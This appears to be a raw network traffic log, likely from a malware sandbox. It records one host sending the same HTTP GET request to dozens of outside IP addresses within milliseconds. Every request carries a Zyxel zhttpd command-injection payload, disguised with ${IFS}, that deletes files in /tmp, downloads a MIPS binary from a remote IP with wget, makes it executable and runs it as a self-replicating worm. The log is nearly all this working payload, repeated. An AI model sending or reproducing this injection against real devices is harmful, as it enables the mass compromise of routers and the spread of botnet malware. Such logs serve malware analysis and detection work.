                                        Jan 14, 2024 16:19:00.840950966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8729192.168.2.1337346168.97.8.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840991974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8730192.168.2.1348750108.200.95.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841034889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8731192.168.2.134113881.215.146.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841068029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8732192.168.2.1346498124.225.72.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841090918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8733192.168.2.1341968151.136.10.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841141939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8734192.168.2.1347090209.14.18.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841182947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8735192.168.2.1354966105.245.142.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841228962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8736192.168.2.1337752118.67.41.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841272116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8737192.168.2.133878837.196.123.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841295958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8738192.168.2.135193645.158.120.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841316938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8739192.168.2.135143094.139.59.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841397047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8740192.168.2.134907092.161.12.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841418028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8741192.168.2.133991251.2.48.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841475964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8742192.168.2.1351466208.150.238.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841516972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8743192.168.2.1359332222.218.119.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841594934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8744192.168.2.135290273.97.186.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841602087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8745192.168.2.1346682182.216.177.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841665983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8746192.168.2.1337990117.186.194.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841687918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8747192.168.2.134899679.74.127.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841728926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8748192.168.2.134826679.54.254.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841763020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8749192.168.2.1338546111.206.49.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841809988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8750192.168.2.133698843.55.120.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841867924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8751192.168.2.134321682.173.164.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841905117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8752192.168.2.135217264.164.42.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841917992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8753192.168.2.135411614.33.139.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841973066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8754192.168.2.1341194203.232.139.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.841993093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8755192.168.2.1348748147.97.185.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842046022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8756192.168.2.134685861.1.244.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842071056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8757192.168.2.133616846.60.65.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842107058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8758192.168.2.1349860167.199.240.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842144012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8759192.168.2.135376448.2.38.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842195034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8760192.168.2.134100423.84.89.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842231989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8761192.168.2.135919480.71.236.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842281103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8762192.168.2.134027420.68.207.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842345953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8763192.168.2.1346500170.220.63.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842376947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8764192.168.2.1359156193.200.238.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842423916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8765192.168.2.1352420163.67.145.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842458010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8766192.168.2.134389071.187.24.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842497110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8767192.168.2.135830498.46.88.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842540979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8768192.168.2.134245675.222.27.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842595100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8769192.168.2.1334720163.223.85.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842626095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8770192.168.2.1333552208.113.96.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842649937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8771192.168.2.135753427.204.62.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842715025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8772192.168.2.134666220.206.216.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842767000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8773192.168.2.133747245.69.238.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842807055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8774192.168.2.1352252147.247.88.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842834949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8775192.168.2.1333636162.138.102.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842899084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8776192.168.2.1351764111.79.132.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842926979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8777192.168.2.134354683.201.136.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.842969894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8778192.168.2.1333654102.147.23.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843003035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8779192.168.2.134056862.104.7.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843040943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8780192.168.2.1346660161.239.204.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843086958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8781192.168.2.135945294.58.75.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843117952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8782192.168.2.133926269.63.115.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843156099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8783192.168.2.1358252160.196.7.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843206882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8784192.168.2.135575812.243.99.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843235016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8785192.168.2.1345370195.125.104.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843255043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8786192.168.2.1348008133.105.32.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843333006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8787192.168.2.1346936202.69.119.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843374014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8788192.168.2.1360286186.120.196.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843400002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8789192.168.2.1334162186.84.85.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843441010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8790192.168.2.1339374199.213.230.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.843475103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8791192.168.2.133527050.76.56.141443
                                        TimestampBytes transferredDirectionData
